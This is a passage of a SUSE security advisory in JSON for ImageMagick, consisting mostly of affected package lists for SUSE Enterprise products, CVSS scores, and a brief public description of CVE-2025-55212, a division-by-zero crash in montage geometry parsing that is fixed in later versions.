"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:01:34Z",
"details": "moderate"
}
],
"title": "CVE-2025-55160"
},
{
"cve": "CVE-2025-55212",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55212"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-28 and 7.1.2-2, passing a geometry string containing only a colon (\":\") to montage -geometry leads GetGeometry() to set width/height to 0. Later, ThumbnailImage() divides by these zero dimensions, triggering a crash (SIGFPE/abort), resulting in a denial of service. This issue has been patched in versions 6.9.13-28 and 7.1.2-2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Enterprise Storage 7.1:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
